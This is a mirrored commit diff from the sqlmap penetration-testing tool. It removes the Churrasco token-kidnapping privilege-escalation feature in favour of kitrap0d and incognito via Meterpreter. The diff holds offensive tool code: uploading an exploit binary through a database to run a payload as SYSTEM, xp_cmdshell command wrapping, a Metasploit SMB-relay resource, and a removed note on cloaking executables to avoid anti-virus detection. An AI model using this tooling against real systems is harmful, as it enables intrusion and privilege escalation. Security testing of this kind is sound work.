mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
Get rid of Churrasco (Token kidnapping technique to --priv-esc). Reasons why:
1. there's kitrap0d (MS10-015) which is far more reliable, just recently fixed 2. works only to priv esc basically on MSSQL when it runs as NETWORK SERVICE and the machine is not patched against MS09-012 which is "rare" (hopefully) nowadays. Now sqlmap relies on kitrap0d and incognito to privilege escalate the database process' user privileges to SYSTEM, both via Meterpreter. Minor layout adjustments.
This commit is contained in:
parent
6b1ae62753
commit
7d8cc1a482
|
@ -225,12 +225,13 @@ blind SQL injection</bf>.
|
||||||
<item>It is possible to provide a single target URL, get the list of
|
<item>It is possible to provide a single target URL, get the list of
|
||||||
targets from <htmlurl url="http://portswigger.net/suite/" name="Burp proxy">
|
targets from <htmlurl url="http://portswigger.net/suite/" name="Burp proxy">
|
||||||
requests log file or
|
requests log file or
|
||||||
<htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project" name="WebScarab proxy">
|
<htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"
|
||||||
<tt>conversations/</tt> folder, get the whole HTTP request from a text
|
name="WebScarab proxy"> <tt>conversations/</tt> folder, get the whole HTTP
|
||||||
file or get the list of targets by providing sqlmap with a Google dork
|
request from a text file or get the list of targets by providing sqlmap
|
||||||
which queries <htmlurl url="http://www.google.com" name="Google"> search engine and
|
with a Google dork which queries <htmlurl url="http://www.google.com"
|
||||||
parses its results page. You can also define a regular-expression based
|
name="Google"> search engine and parses its results page. You can also
|
||||||
scope that is used to identify which of the parsed addresses to test.
|
define a regular-expression based scope that is used to identify which of
|
||||||
|
the parsed addresses to test.
|
||||||
|
|
||||||
<item>Automatically tests all provided <bf>GET</bf> parameters,
|
<item>Automatically tests all provided <bf>GET</bf> parameters,
|
||||||
<bf>POST</bf> parameters, HTTP <bf>Cookie</bf> header values and HTTP
|
<bf>POST</bf> parameters, HTTP <bf>Cookie</bf> header values and HTTP
|
||||||
|
@ -639,7 +640,7 @@ Options:
|
||||||
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
|
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
|
||||||
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
|
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
|
||||||
--os-bof Stored procedure buffer overflow exploitation
|
--os-bof Stored procedure buffer overflow exploitation
|
||||||
--priv-esc User priv escalation by abusing Windows access tokens
|
--priv-esc Database process' user privilege escalation
|
||||||
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
|
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
|
||||||
--tmp-path=TMPPATH Remote absolute path of temporary files directory
|
--tmp-path=TMPPATH Remote absolute path of temporary files directory
|
||||||
|
|
||||||
|
@ -5051,11 +5052,9 @@ send the NTLM session hash when connecting to a SMB service
|
||||||
[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
|
[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
|
||||||
[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
|
[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
|
||||||
[hh:mm:16] [INFO] which payload do you want to use?
|
[hh:mm:16] [INFO] which payload do you want to use?
|
||||||
[1] Reflective Meterpreter (default)
|
[1] Meterpreter (default)
|
||||||
[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
|
[2] Shell
|
||||||
[3] Shell
|
[3] VNC
|
||||||
[4] Reflective VNC
|
|
||||||
[5] PatchUp VNC (only from Metasploit development revision 6742)
|
|
||||||
> 1
|
> 1
|
||||||
[hh:mm:16] [INFO] which SMB port do you want to use?
|
[hh:mm:16] [INFO] which SMB port do you want to use?
|
||||||
[1] 139/TCP (default)
|
[1] 139/TCP (default)
|
||||||
|
|
Binary file not shown.
|
@ -1,11 +0,0 @@
|
||||||
Due to the anti-virus positive detection of executable stored inside this
|
|
||||||
folder, we needed to somehow circumvent this. As from the plain sqlmap
|
|
||||||
users perspective nothing has to be done prior to its usage by sqlmap, but
|
|
||||||
if you want to have access to the original executable use the decrypt
|
|
||||||
functionality of the ../extra/cloak/cloak.py utility.
|
|
||||||
|
|
||||||
To prepare the executable to the cloaked form use this command:
|
|
||||||
python ../extra/cloak/cloak.py -i Churrasco.exe
|
|
||||||
|
|
||||||
To get back the original executable use this:
|
|
||||||
python ../extra/cloak/cloak.py -d -i Churrasco.exe_
|
|
|
@ -352,8 +352,7 @@ def cmdLineParser():
|
||||||
"exploitation")
|
"exploitation")
|
||||||
|
|
||||||
takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
|
takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
|
||||||
help="User priv escalation by abusing Windows "
|
help="Database process' user privilege escalation")
|
||||||
"access tokens")
|
|
||||||
|
|
||||||
takeover.add_option("--msf-path", dest="msfPath",
|
takeover.add_option("--msf-path", dest="msfPath",
|
||||||
help="Local path where Metasploit Framework 3 "
|
help="Local path where Metasploit Framework 3 "
|
||||||
|
|
|
@ -185,7 +185,7 @@ class Metasploit:
|
||||||
elif kb.os == "Windows" and encode:
|
elif kb.os == "Windows" and encode:
|
||||||
return self.__skeletonSelection("payload encoding", self.__msfEncodersList)
|
return self.__skeletonSelection("payload encoding", self.__msfEncodersList)
|
||||||
|
|
||||||
def __selectPayload(self, askChurrasco=True):
|
def __selectPayload(self):
|
||||||
if kb.os == "Windows" and conf.privEsc:
|
if kb.os == "Windows" and conf.privEsc:
|
||||||
infoMsg = "forcing Metasploit payload to Meterpreter because "
|
infoMsg = "forcing Metasploit payload to Meterpreter because "
|
||||||
infoMsg += "it is the only payload that can be used to "
|
infoMsg += "it is the only payload that can be used to "
|
||||||
|
@ -249,19 +249,7 @@ class Metasploit:
|
||||||
|
|
||||||
break
|
break
|
||||||
|
|
||||||
elif not askChurrasco:
|
|
||||||
logger.warn("beware that the VNC injection might not work")
|
|
||||||
|
|
||||||
break
|
|
||||||
|
|
||||||
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
|
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
|
||||||
uploaded = self.uploadChurrasco()
|
|
||||||
|
|
||||||
if not uploaded:
|
|
||||||
warnMsg = "beware that the VNC injection "
|
|
||||||
warnMsg += "might not work"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
|
|
||||||
break
|
break
|
||||||
|
|
||||||
elif not choice.isdigit():
|
elif not choice.isdigit():
|
||||||
|
@ -312,12 +300,12 @@ class Metasploit:
|
||||||
def __selectConnection(self):
|
def __selectConnection(self):
|
||||||
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
||||||
|
|
||||||
def __prepareIngredients(self, encode=True, askChurrasco=True):
|
def __prepareIngredients(self, encode=True):
|
||||||
self.connectionStr = self.__selectConnection()
|
self.connectionStr = self.__selectConnection()
|
||||||
self.lhostStr = self.__selectLhost()
|
self.lhostStr = self.__selectLhost()
|
||||||
self.rhostStr = self.__selectRhost()
|
self.rhostStr = self.__selectRhost()
|
||||||
self.portStr = self.__selectPort()
|
self.portStr = self.__selectPort()
|
||||||
self.payloadStr = self.__selectPayload(askChurrasco)
|
self.payloadStr = self.__selectPayload()
|
||||||
self.encoderStr = self.__selectEncoder(encode)
|
self.encoderStr = self.__selectEncoder(encode)
|
||||||
|
|
||||||
if self.payloadStr == "linux/x86/shell":
|
if self.payloadStr == "linux/x86/shell":
|
||||||
|
@ -350,7 +338,7 @@ class Metasploit:
|
||||||
def __forgeMsfConsoleResource(self):
|
def __forgeMsfConsoleResource(self):
|
||||||
self.resourceFile = os.path.join(conf.outputPath, self.__randFile)
|
self.resourceFile = os.path.join(conf.outputPath, self.__randFile)
|
||||||
|
|
||||||
self.__prepareIngredients(encode=False, askChurrasco=False)
|
self.__prepareIngredients(encode=False)
|
||||||
|
|
||||||
self.__resource = "use windows/smb/smb_relay\n"
|
self.__resource = "use windows/smb/smb_relay\n"
|
||||||
self.__resource += "set SRVHOST %s\n" % self.lhostStr
|
self.__resource += "set SRVHOST %s\n" % self.lhostStr
|
||||||
|
@ -426,9 +414,6 @@ class Metasploit:
|
||||||
|
|
||||||
cmd = "%s &" % self.exeFilePathRemote
|
cmd = "%s &" % self.exeFilePathRemote
|
||||||
|
|
||||||
if self.cmdFromChurrasco and kb.stackedTest:
|
|
||||||
cmd = "%s \"%s\"" % (self.churrascoPath, cmd)
|
|
||||||
|
|
||||||
if kb.dbms == "Microsoft SQL Server" and kb.stackedTest:
|
if kb.dbms == "Microsoft SQL Server" and kb.stackedTest:
|
||||||
cmd = self.xpCmdshellForgeCmd(cmd)
|
cmd = self.xpCmdshellForgeCmd(cmd)
|
||||||
|
|
||||||
|
@ -462,7 +447,7 @@ class Metasploit:
|
||||||
infoMsg = "displaying the list of Access Tokens availables. "
|
infoMsg = "displaying the list of Access Tokens availables. "
|
||||||
infoMsg += "Choose which user you want to impersonate by "
|
infoMsg += "Choose which user you want to impersonate by "
|
||||||
infoMsg += "using incognito's command 'impersonate_token' if "
|
infoMsg += "using incognito's command 'impersonate_token' if "
|
||||||
infoMsg += "'getsystem' did not success to elevate privileges"
|
infoMsg += "'getsystem' does not success to elevate privileges"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
proc.stdin.write("list_tokens -u\n")
|
proc.stdin.write("list_tokens -u\n")
|
||||||
|
@ -534,7 +519,7 @@ class Metasploit:
|
||||||
self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
|
self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
|
||||||
|
|
||||||
self.__initVars()
|
self.__initVars()
|
||||||
self.__prepareIngredients(encode=encode, askChurrasco=False)
|
self.__prepareIngredients(encode=encode)
|
||||||
self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)
|
self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)
|
||||||
|
|
||||||
logger.debug("executing local command: %s" % self.__payloadCmd)
|
logger.debug("executing local command: %s" % self.__payloadCmd)
|
||||||
|
|
|
@ -54,32 +54,9 @@ class Takeover(Abstraction, Metasploit, Registry):
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self.cmdTblName = "sqlmapoutput"
|
self.cmdTblName = "sqlmapoutput"
|
||||||
self.tblField = "data"
|
self.tblField = "data"
|
||||||
self.cmdFromChurrasco = False
|
|
||||||
|
|
||||||
Abstraction.__init__(self)
|
Abstraction.__init__(self)
|
||||||
|
|
||||||
def uploadChurrasco(self):
|
|
||||||
msg = "do you want sqlmap to upload Churrasco and call the "
|
|
||||||
msg += "Metasploit payload stager as its argument so that it "
|
|
||||||
msg += "will be started as SYSTEM? [y/N] "
|
|
||||||
|
|
||||||
output = readInput(msg, default="N")
|
|
||||||
|
|
||||||
if output and output[0] in ( "y", "Y" ):
|
|
||||||
tmpFile = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_"))
|
|
||||||
|
|
||||||
wFile = tmpFile.name
|
|
||||||
self.churrascoPath = "%s/tmpc%s.exe" % (conf.tmpPath, randomStr(lowercase=True))
|
|
||||||
self.cmdFromChurrasco = True
|
|
||||||
|
|
||||||
self.writeFile(wFile, self.churrascoPath, "binary", confirm=False)
|
|
||||||
|
|
||||||
tmpFile.close()
|
|
||||||
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
def osCmd(self):
|
def osCmd(self):
|
||||||
stackedTest()
|
stackedTest()
|
||||||
|
|
||||||
|
@ -172,27 +149,6 @@ class Takeover(Abstraction, Metasploit, Registry):
|
||||||
debugMsg += "user, no need to privilege escalate"
|
debugMsg += "user, no need to privilege escalate"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
elif kb.dbms == "PostgreSQL":
|
|
||||||
debugMsg = "by default PostgreSQL on Windows runs as postgres "
|
|
||||||
debugMsg += "user which has no access to LSASS: it is "
|
|
||||||
debugMsg += "unlikely that the privilege escalation "
|
|
||||||
debugMsg += "via 'incognito' extension will be successful"
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
|
|
||||||
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
|
|
||||||
debugMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
|
|
||||||
debugMsg += "runs as Network Service which has Windows "
|
|
||||||
debugMsg += "Impersonation Tokens"
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
|
|
||||||
uploaded = self.uploadChurrasco()
|
|
||||||
|
|
||||||
if not uploaded:
|
|
||||||
debugMsg = "beware that the privilege escalation "
|
|
||||||
debugMsg += "might not work via Churrasco if "
|
|
||||||
debugMsg += "MS09-012 patch is installed"
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
|
|
||||||
elif kb.os != "Windows" and conf.privEsc:
|
elif kb.os != "Windows" and conf.privEsc:
|
||||||
# Unset --priv-esc if the back-end DBMS underlying operating
|
# Unset --priv-esc if the back-end DBMS underlying operating
|
||||||
# system is not Windows
|
# system is not Windows
|
||||||
|
|
|
@ -375,10 +375,9 @@ osSmb = False
|
||||||
# Valid: True or False
|
# Valid: True or False
|
||||||
osBof = False
|
osBof = False
|
||||||
|
|
||||||
# Local User privilege escalation by abusing Windows access tokens using
|
# Database process' user privilege escalation.
|
||||||
# Meterpreter incognito extension.
|
# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the
|
||||||
# Note: Use in conjunction with osPwn or osSmb. It will force the payload
|
# payload to be Meterpreter.
|
||||||
# to be Meterpreter.
|
|
||||||
privEsc = False
|
privEsc = False
|
||||||
|
|
||||||
# Local path where Metasploit Framework 3 is installed.
|
# Local path where Metasploit Framework 3 is installed.
|
||||||
|
|
Loading…
Reference in New Issue
Block a user